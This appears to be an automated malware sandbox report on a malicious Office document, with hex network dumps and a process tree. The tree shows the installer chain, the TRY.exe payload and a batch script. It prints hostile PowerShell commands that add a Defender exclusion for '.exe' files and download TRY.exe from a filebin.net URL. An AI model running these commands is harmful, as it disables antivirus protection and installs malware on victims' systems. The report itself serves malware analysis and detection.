2022-04-20 07:18:56 UTC353INData Raw: 98 29 00 00 49 03 dc 3c 41 74 47 3c 44 74 3a 3c 49 74 2d 3c 4e 74 20 3c 50 74 12 3c 53 74 05 41 8b f7 eb 3b 83 0d 7d 72 00 00 04 eb 2b 0f ba 2d 3f 64 00 00 07 eb 28 83 25 6a 72 00 00 fe eb 18 83 25 61 72 00 00 fd eb 0f 83 0d 24 64 00 00 40 eb 0d 09 3d 50 72 00 00 44 89 25 f5 60 00 00 8a 03 84 c0 75 95 e9 4a ff ff ff 83 4c 24 28 ff 48 8d 44 24 41 41 83 c9 ff 48 89 44 24 20 4c 8d 05 78 2d 00 00 41 8b d4 b9 7f 00 00 00 ff 15 a2 25 00 00 2b c7 0f 84 1a ff ff ff e9 12 ff ff ff 8a 44 24 42 84 c0 75 0c 66 89 3d b6 60 00 00 e9 01 ff ff ff 3c 3a 0f 85 f6 fe ff ff 48 0f be 4c 24 43 ff 15 d5 28 00 00 3c 31 74 dc 3c 41 74 09 3c 55 74 d4 e9 d9 fe ff ff 66 44 89 25 84 60 00 00 e9 cf fe ff ff 8a 44 24 42 84 c0 75 0c 44 89 25 64 60 00 00 e9 bb fe ff ff 3c 3a 0f 85 b0 fe
Data Ascii: )I<AtG<Dt:<It-<Nt <Pt<StA;}r+-?d(%jr%ar$d@=PrD%`uJL$(HD$AAHD$ Lx-A%+D$Buf=`<:HL$C(<1t<At<UtfD%`D$BuD%d`<:
2022-04-20 07:18:56 UTC369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 11 00 00 b7 11 00 00 90 9c 00 00 c0 11 00 00 b8 12 00 00 9c 9c 00 00 c0 12 00 00 89 14 00 00 b8 9c 00 00 90 14 00 00 53 15 00 00 dc 9c 00 00 5c 15 00 00 ef 15 00 00 f4 9c 00 00 f8 15 00 00 3c 1b 00 00 08 9d 00 00 44 1b 00 00 31 1c 00 00 2c 9d 00 00 38 1c 00 00 fa 1e 00 00 3c 9d 00 00 00 1f 00 00 ba 20 00 00 60 9d 00 00 c0 20 00 00 6c 21 00 00 80 9d 00 00 74 21 00 00 95 22 00 00 98 9d 00 00 9c 22 00 00 1e 23 00 00 a4 9d 00 00 24 23 00 00 40 24 00 00 bc 9d 00 00 48 24 00 00 21 26 00 00 d0 9d 00 00 28 26 00
Data Ascii: DS\<D1,8< ` l!t!""#$#@$H$!&(&
2022-04-20 07:18:56 UTC385INData Raw: 00 00 00 00 88 ff ff ff f8 8f ff 8f 8f f8 88 88 85 78 88 70 00 00 00 00 00 00 00 00 7f ff ff ff ff f8 88 88 77 78 78 77 88 7c 88 80 00 00 00 00 00 00 00 00 88 f8 88 87 77 67 77 77 78 78 88 88 88 88 88 88 00 00 00 00 00 00 00 00 78 77 87 67 67 77 87 88 88 88 88 88 88 88 78 87 00 00 00 00 00 00 00 00 78 88 77 78 88 88 f8 8f 8f 8f 8f 8f 8f 88 8c f8 80 00 00 00 00 00 00 00 88 88 87 88 ff ff ff f8 f8 f8 8f 88 88 88 88 78 70 00 00 00 00 00 00 00 78 88 78 88 f8 f8 f8 f8 f8 ff 88 f8 ff 8f 88 87 80 00 00 00 00 00 00 00 78 88 88 78 f8 ff 8f 8f f8 f8 f8 f8 88 88 88 80 00 00 00 00 00 00 00 00 88 88 78 88 ff 8f 8f f8 8f 88 88 88 88 88 88 70 00 00 00 00 00 00 00 00 87 88 80 08 88 88 88 88 88 88 88 87 87 87 87 00 00 00 00 00 00 00 00 00 00 00 00 08 88 88 88 88 78 88 88
Data Ascii: xpwxxw|wgwwxxxwggwxxwxxpxxxxxpx
2022-04-20 07:18:56 UTC401INData Raw: 9c 26 e7 2e 0f 83 41 64 ed 4b 21 10 ce d2 af 87 2a 80 21 97 06 0c 26 75 e7 53 53 2c 0a 72 2b d8 cc 09 a9 20 b7 01 14 52 85 ad 81 fd fe b1 a6 9f a5 f4 dc e6 fb d8 46 1f c7 24 dd 33 8f d8 9b f6 6f 9c 4e 9e 9b f4 c8 c7 db 9d 5c d7 a2 b4 2a 8b ff 34 fd fb fd c4 b8 a4 f4 e8 f7 db 27 72 20 9e 95 1e 16 8e 56 6a 04 7c 90 36 84 49 ab ad 7e f9 97 7f 73 af db ed c7 49 92 12 04 7e 11 fd 97 45 f7 e9 cc 72 6b 32 f7 9e 35 a3 91 82 a3 52 c0 88 17 20 3f f6 ad b1 7f 14 f8 97 45 4f c4 06 14 08 c8 ad cb 65 9a 2c 05 08 46 03 59 96 33 ce e5 65 4e 2b 9b 2f 1a 9a 4d 27 c3 7d e7 a1 f1 b6 e7 eb f7 22 f5 2f da a3 47 47 49 12 c5 f7 ef bf f7 fa a4 6b f3 ae 14 9c 94 2e ff 61 d9 e3 96 8e 04 5c a5 65 73 d9 28 43 21 78 67 30 88 7b 71 9c a2 86 09 30 0a 57 9f d6 64 2e 42 0b 23 de 81 5c 05
Data Ascii: &.AdK!*!&uSS,r+ RF$3oN\*4'r Vj|6I~sI~Erk25R ?EOe,FY3eN+/M'}"/GGIk.a\es(C!xg0{q0Wd.B#\
2022-04-20 07:18:56 UTC417INData Raw: cb 11 5e 9f 06 d3 dc 7d 41 e1 e7 48 7c a8 02 0c 7b db 36 3f 49 7f 27 7f 7e 6b ee a7 40 5d f2 e3 7d 58 6f bb be ef 4e 1d 0a 6d d6 8c 09 29 c0 5c 28 a4 d2 b1 38 2b 59 78 a1 1d 79 42 18 84 fe 0c c9 9d e8 df 91 8e 95 e4 ab bd fb 75 9b fb 70 57 37 20 f9 f5 5a 6b b2 7c c0 b0 28 28 ca 32 7c 8a 21 4a b5 45 69 09 9e 1e 40 62 a1 ca b4 8e 69 4e 6b 2d 83 c1 98 f1 b8 d8 ee f7 eb a0 b7 8d 1c bc 73 1a f0 2e 27 30 1c 0e 4d 96 65 0d e0 bb 37 a8 cb 1c 09 f4 d3 e2 02 42 33 cc d6 3f df df 6f 94 ca f9 e3 c7 8f eb a7 4f bf 12 79 5e 72 7e 71 8e 31 1b 3e f9 e4 1f 78 fa ec 2b 74 96 6f a5 37 b4 8c d6 3d 76 62 e8 2e f3 76 2d 8f fe f6 e9 dc fb d7 72 1b 6d 21 bf 07 84 41 f7 f7 ee be fb fd 13 bb d6 09 10 05 80 47 23 d1 42 d2 58 43 e3 42 bf 01 4c 28 62 2a 87 13 f2 ec 84 c6 3a 5c 63 19
Data Ascii: ^}AH|{6?I'~k@]}XoNm)\(8+YxyBupW7 Zk|((2|!JEi@biNk-s.'0Me7B3?oOy^r~q1>x+to7=vb.v-rm!AG#BXCBL(b*:\c
2022-04-20 07:18:56 UTC433INData Raw: c6 8a 2c 75 ae c1 aa 8a 59 c5 35 45 d5 50 d6 0d 95 cf bb 68 b4 03 41 c3 ef 61 ad 8b c8 48 e1 aa 2f f1 dd 93 94 92 48 a1 5d ca 72 a3 c1 1a e2 38 02 65 a9 6c 89 ad 0d 30 70 89 49 c6 f8 c4 a0 f0 1b 75 31 81 f3 dc 80 b3 02 20 bc 3e b3 8f 65 a3 4c fa 69 50 07 f2 78 a0 05 10 e8 1b df f8 86 00 27 0c fc fb 5f 88 2c 86 27 2e 00 4e 4e 4e 58 2c 16 5a 29 65 42 0f fc 60 5a b6 20 60 00 a2 c2 55 14 d6 25 b3 00 d6 5a ab b5 2e 8c 31 ec ed ed fd 89 37 df 7c f3 c3 ef 7c e7 3b 95 90 62 7c 7c 7c f4 d3 83 83 83 eb 42 46 51 53 e6 58 bb 39 2e bc 1f 01 e8 32 7b 77 5b d8 be 16 4a 6b c0 ab 35 ff 7d e5 5f 92 24 4c 26 13 46 a3 11 79 9e b3 58 2c 30 c6 0d f3 3c 3e 3e a2 ae 4a c6 7b 7b ae 9d b7 8c 5d f9 ae 14 a0 24 c2 0f b1 70 4c e0 46 81 c7 42 92 8c 52 46 d9 80 38 49 68 ea 86 b2 2c b0
Data Ascii: ,uY5EPhAaH/H]r8el0pIu1 >eLiPx'_,'.NNNX,Z)eB`Z `U%Z.17||;b|||BFQSX9.2{w[Jk5}_$L&FyX,0<>>J{{]$pLFBRF8Ih,
2022-04-20 07:18:56 UTC449INData Raw: 71 ee 07 d4 fd 94 b0 7b 35 4d 5f cb 35 a1 0b ae 25 18 2b ad 32 56 6e 1d ce d3 fe 62 11 a0 50 b0 f0 c6 1b e7 0a 07 0e 1c 7c 2f 97 9b 78 fc d2 a5 c1 7f a0 64 c2 cb f7 ef df 1f 2d f4 95 13 fb 22 53 de 38 6c 45 3a 35 8e e2 96 7e ab 2e 02 56 4a 03 ad 48 07 9d 20 a8 38 a4 94 66 62 1e b4 53 4e 5c 75 89 70 26 93 25 9f af b3 c8 78 df 17 1f 8e b6 1b 2f ff fd c4 6b a7 28 d3 7b 08 21 6b 1c e9 6e 92 81 7b 3b 43 b0 dd f6 dc cd cc 73 6f 21 52 ac 37 34 d2 d3 cb 2d a1 13 97 7a 41 91 d8 3e e0 04 14 b6 e4 70 1d 1d 96 3d 83 c2 ac 00 a5 02 82 eb d0 8d 04 28 13 28 58 0e 2c cb 81 27 03 48 0a 7c 34 3d 85 e2 f0 79 2a 6d 07 8c 72 c6 18 83 ef fb 11 61 5d d3 41 e6 27 3f f9 ce 65 00 97 33 99 cc af 00 e0 c0 81 e3 1b ec 59 eb eb 80 7a 84 52 d6 af 69 7a 2f e7 42 70 2e 44 78 0a 0f a4 f4
Data Ascii: q{5M_5%+2VnbP|/xd-"S8lE:5~.VJH 8fbSN\up&%x/k({!kn{;Cso!R74-zA>p=((X,'H|4=y*mra]A'?e3YzRiz/Bp.Dx
2022-04-20 07:18:56 UTC465INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5b 5c 5c 3f 3e 3e 3d f5 8f 87 8a ff b0 b2 b2 ff 9b ae 87 ff b2 ad 8b ff e6 e2 e1 ff ec e9 e4 ff ca c9 c7 ff 97 95 99 ff 94 90 97 ff 99 91 99 ff aa b8 c9 ff bd b9 bf ff e5 c3 c2 ff f8 f1 f1 ff c2 b7 b7 ff e4 d4 d4 ff b6 9b 9b f4 a4 85 85 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5d 5e 5e 40 4a 41 43 f6 7f a4 97 ff 4e e3 9d ff 77 b4 7b ff a4 9f 98 ff c7 c5 c6 ff ea e8 e7 ff da da da ff b1 b2 b2 ff 9a 98 96 ff 99 9b 9c ff 87 be e1 ff ad ba c7 ff e8 c6 c5 ff fa f2 f2 ff c2 b7 b9 ff e7 d6 d6 ff b7 9c 9c f4 a1 83 83 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 5f 5f 41 51 46 4a f6 95 c2 b0 ff 5a c7 9b ff 9d 9e 9f ff b5 b2 b4 ff ce ce ce ff f0 f0 f0 ff f0 f0 f0 ff cd cd ce ff b8 b2 ae ff a7 be ce
Data Ascii: [\\?>>=]^^@JACNw{^__AQFJZ


Statistics

Behavior

Click to jump to process

System Behavior

General

Target ID:0
Start time:09:19:12
Start date:20/04/2022
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:0x13f890000
File size:1423704 bytes
MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:2
Start time:09:19:15
Start date:20/04/2022
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\msiexec.exe /V
Imagebase:0xff7e0000
File size:128512 bytes
MD5 hash:AC2E7152124CEED36846BD1B6592A00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Target ID:4
Start time:09:19:19
Start date:20/04/2022
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Imagebase:0x310000
File size:73216 bytes
MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Target ID:5
Start time:09:19:23
Start date:20/04/2022
Path:C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Imagebase:0x6b0000
File size:27136 bytes
MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Target ID:7
Start time:09:19:24
Start date:20/04/2022
Path:C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Imagebase:0xde0000
File size:53248 bytes
MD5 hash:659CED6D7BDA047BCC6048384231DB9F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Target ID:9
Start time:09:19:27
Start date:20/04/2022
Path:C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Imagebase:0x13fb60000
File size:155136 bytes
MD5 hash:96DF7B0C491646EFC2E5F2E9F0443B8B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Target ID:10
Start time:09:19:30
Start date:20/04/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /c thai.bat
Imagebase:0x4a1d0000
File size:345088 bytes
MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:12
Start time:09:19:31
Start date:20/04/2022
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Imagebase:0x13f770000
File size:473600 bytes
MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

General

Target ID:13
Start time:09:19:34
Start date:20/04/2022
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Imagebase:0x13f910000
File size:473600 bytes
MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

General

Target ID:15
Start time:09:19:38
Start date:20/04/2022
Path:C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Imagebase:0xee0000
File size:27136 bytes
MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Target ID:17
Start time:09:19:46
Start date:20/04/2022
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:0xffa50000
File size:45568 bytes
MD5 hash:DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Disassembly

No disassembly